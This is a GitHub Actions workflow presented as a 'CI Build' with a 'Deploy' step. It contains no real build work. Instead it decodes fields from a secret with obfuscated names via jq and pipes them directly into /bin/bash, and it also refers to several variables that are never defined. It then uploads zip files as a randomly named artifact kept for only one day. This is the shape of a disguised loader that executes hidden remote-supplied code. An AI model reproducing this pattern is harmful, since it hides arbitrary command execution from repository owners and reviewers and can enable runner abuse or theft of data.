name: CI Build
on:
  workflow_dispatch:

env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          zbo130: ${{ secrets.zbo130 }}
        run: |
          printf '%s' "$zbo130" | jq -r .d15074 | /bin/bash
          printf '%s' "$dyzd12" | jq -r .zhjc94 | /bin/bash
          printf '%s' "$fm036" | jq -r .iqunm135 | /bin/bash
          echo $x53 | jq -r .ixl4 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: vg1vGz8S
          path: "*.zip"
          retention-days: 1
